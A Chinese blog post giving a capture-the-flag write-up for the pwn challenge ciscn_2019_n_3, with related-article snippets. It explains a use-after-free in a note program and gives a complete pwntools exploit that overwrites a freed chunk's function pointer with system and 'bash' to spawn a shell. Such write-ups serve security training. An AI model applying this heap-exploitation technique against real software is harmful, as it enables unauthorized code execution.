ciscn_2019_n_3

最新推荐文章于 2024-01-20 05:10:40 发布
最新推荐文章于 2024-01-20 05:10:40 发布
阅读量122 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53062301/article/details/119536863
版权

一道uaf的题目,不是很难,题目还是一个菜单题目,但是它的add功能具有两种type,一种是存储int类型的整数,一种是str字符串,它先会申请0xC大小的堆块,如果是int类型的话,就不会申请新的堆块,并且堆的布局如下:

size+1(1是标志位)(0x11)
*int_print
*int_free

value

 如果申请是str类型的话,chunk布局如下:

size+1(1是标志位)(0x11) //chunk1
*str_print
*str_free
*value
size+1(1是标志位) (申请chunk大小) //chunk2
value

释放的时候我们可以看IDA中

int do_del()
{
  int v0; // eax@1

  v0 = ask("Index");
  return (*(records[v0] + 4))(records[v0]);
}

释放时是让free函数指针去free掉records[v0]中的内容这样我们就可以写思路了,就先申请三个int类型chunk,,然后再将其中两个释放掉,再申请一个0xC大小的chunk,这样释放掉的两个会从fastbin中回收供用户使用,这个时候我们就可以将原本*int_free处改写为system_plt再将 *int_free前4个字节处改为sh或bash,然后free这个payload处原本的chunk就可以get shell了,exp如下:

from pwn import *
from LibcSearcher import *
from struct import pack 
context(log_level="debug",os="linux",arch="amd64")

sd = lambda x:a.send(x)
sl = lambda x:a.sendline(x)
ru = lambda x:a.recvuntil(x)
rl = lambda :a.recvline()
ra = lambda :a.recv()
rn = lambda x:a.recv(x)
sla = lambda x,y:a.sendlineafter(x,y)

local = 'ciscn_2019_n_3'
a = process(local)
libc = ELF("libc-2.24.so")
#a = remote("node4.buuoj.cn",28770)
elf = ELF(local)
def create(idx,type,value,length=0):
    sla("CNote > ",str(1))
    sla("Index > ",str(idx))
    sla("Type > ",str(type))
    if type == 1:
        sla("Value > ",str(value))
    else:
        sla("Length > ",str(length))
        ru("Value > ")
        if length == 8:
            sd(value)
        else:
            sd(value)

def free(idx):
    sla("CNote > ",str(2))
    sla("Index > ",str(idx))

def show(idx):
    sla("CNote > ",str(3))
    sla("Index > ",str(idx))

create(0,1,1)
create(1,1,1)
create(2,1,1)
#gdb.attach(a)
free(0)
free(1)
payload = 'bash' + p32(elf.sym["system"]) + '\n' #此处需要用\x0a覆盖掉原本的0x1
create(3,2,payload,0xc)
#gdb.attach(a)
free(0)
a.interactive()

Aslhs_0
关注
ciscn_2019_n_3 题解
lifanxin的博客
12-30 615
Write Up知识点关键字样本运行静态分析求解思路求解脚本 知识点关键字 UAF fastbin 样本 ciscn_2019_n_3 运行 检查样本   32位小端程序,开启了栈保护和NX保护。 运行样本   样本的运行结果如上图所示:该程序主要模仿了一个笔记管理的功能,选项1可以开辟新的节点,会让选中是整型还是文本;选项2会让我们根据索引删除一个节点;选型3可以打印一个节点中存储的数据信息;选项4主要是打印一个随机生成的金钱数目,告诉你没法购买Pro版本。   此处不赘述也不一一截图运行结果,读者可
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 574
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1836
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3107
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u
ciscn_2019_ne_3
seaaseesa的博客
05-07 441
ciscn_2019_ne_3 (在rop长度过小情况下,通过read劫持read自身的返回来达到后续大量rop) 首先检查一下程序的保护机制 然后,我们用IDA分析一下,32位栈溢出,难点在于结束变更了两次esp,因此,我们单纯的溢出,直接会造成esp变更到一个无效的地址处。 因此,我们需要将将ecx覆盖为bss段,将栈切换到bss上进行rop。但是切换到bss之前,需要先...
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 647
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 395
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
[BUUCTF]PWN——ciscn_2019_n_3
mcmuyanga的博客
01-06 917
ciscn_2019_n_3 附件 步骤 例行检查,32位,开启了nx和canary保护 本地试运行一下,经典的堆题的菜单 3.32位ida载入 new(),申请了两个chunk,第一个chunk(13行)固定大小0xC,存放的是rec_int_print和rec_int_free函数的地址,第二个chunk(32行),是我们申请的chunk del() 如果值是整数,直接 free chunk 如果值是字符串,则 chunk 和存储字符串的 chunk 都要 free。注意这里只是进行了
buuctf ciscn_2019_n_3
weixin_45677731的博客
08-31 275
do_new函数: 申请一个0xc大小的chunk,前四个字节存放的是输出函数的地址,中间四个字节存储的是删除函数的地址,最后四个字节,因数据类型的不同而不同 当你选择整数类型,最后四个字节存放的就是一个数字 当你选择文本类型,你就可以向程序请求申请一个一定大小的chunk用于存放文本,而最后四个字节存放的就是这个新的chunk的地址 do_dump函数: 输出内容 do_del函数: 发现free并未将指针置0,再看rec_int_free函数和rec_str_free函数,也没有置0,存在UAF的漏
ciscn_2019_n_3[use after free]
、moddemod
07-05 264
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def new_note(idx, _type, length, value): p.sendlineafter('CNote > ', str(1)) p.sendlineafter('Index > ', str(idx)) p.sendlin..
ciscn_2019_n_3 Writeup
Calllin的博客
05-10 481
前提 本程序中的释放堆块后未对堆块指针置空,从而可能引发UAF。 程序本身带有函数system(),可以直接使用system@plt的方式使用该函数。 涉及堆块结构的代码如下下文所示,第一种块大小固定位0x10(0x11),有一种块大小可控,最大为0x400。 //当堆块结构是integer时 *(_DWORD *)v3 = rec_int_print; *(_DWORD *)(v3 + 4) = rec_int_free; *(_DWORD *)(v3 + 8) = ask("Value"); //
ciscn_2019_n_3 writeup
SkYe's Blog
10-24 623
基本情况 这题被环境坑了一把,用的是 docker 环境做题,checksec 检测是保护全开,ida 分析时也没有留意地址都是真实地址,所以一直没想用 system@plt getshell 。。。后面才发现程序是关闭 PIE ,程序有 system ,直接调用不需要泄露 libc 操作。 程序是一个有增删查的堆管理器,根据存储资料的类型分为两类,对应结构体如下: struct int_chunk { void *rec_int_print(); void *rec_int_free();
[BUUCTF]-PWN:ciscn_2019_n_3解析
最新发布
2301_79326813的博客
01-20 839
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
ciscn_2019_n_3题目细说
Tw0的博客
02-04 203
修正一些exp讲解思路不对的地方,讲述真正getshell的原理。
buuoj刷题记录 - ciscn_2019_n_3 1
qq_34010404的博客
03-15 450
查看程序保护: IDA分析程序,可以发现程序存在UAF漏洞: 只要使某一个Node的数据区域和已经free的Node的12个字节相重合,就可以修改函数地址. 只需要这样构造即可: 释放掉Node1,Node0,然后add一个 content为12字节的Node.就可以修改Node1的前12个字节. 1.可以修改Note1的前四个字节为 ‘sh\x00\x00’,后四个改为system.plt 2.可以修改Node1前四个字节为system.plt 的下一条指令地址(直接jmp由于该指令的地址低字节为
对“ciscn_2019_n_3“的理解
Probeginner的博客
07-05 186
fastbin( size attack)简单实践
BUUCTF|PWN-ciscn_2019_n_1-WP
l2645470582_的博客
07-28 290
1、下载文件并开启靶机 2、在Linux系统中查看该文件信息 checksec ciscn_2019_n_1 3、文件查出来是64位文件,我们用64位IDA打开该文件 3.1、shift+f12查看关键字符串 3.2、双击关键字符串cat/flag,再按F5进入反编译代码区 3.3、cat/flag地址为 v1地址: r返回地址: 4、编译代码 #encoding=utf-8 from pwn imp...
ciscn_2019_c_1
09-12
根据您提供的引用内容和,题目"ciscn_2019_c_1"是一个涉及到fastbin堆漏洞利用的题目。fastbin是一个堆区的数据结构,用于存储小于等于64字节的空闲块。这个题目的漏洞利用难度不大,适合初学者练习。 根据的代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Aslhs_0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值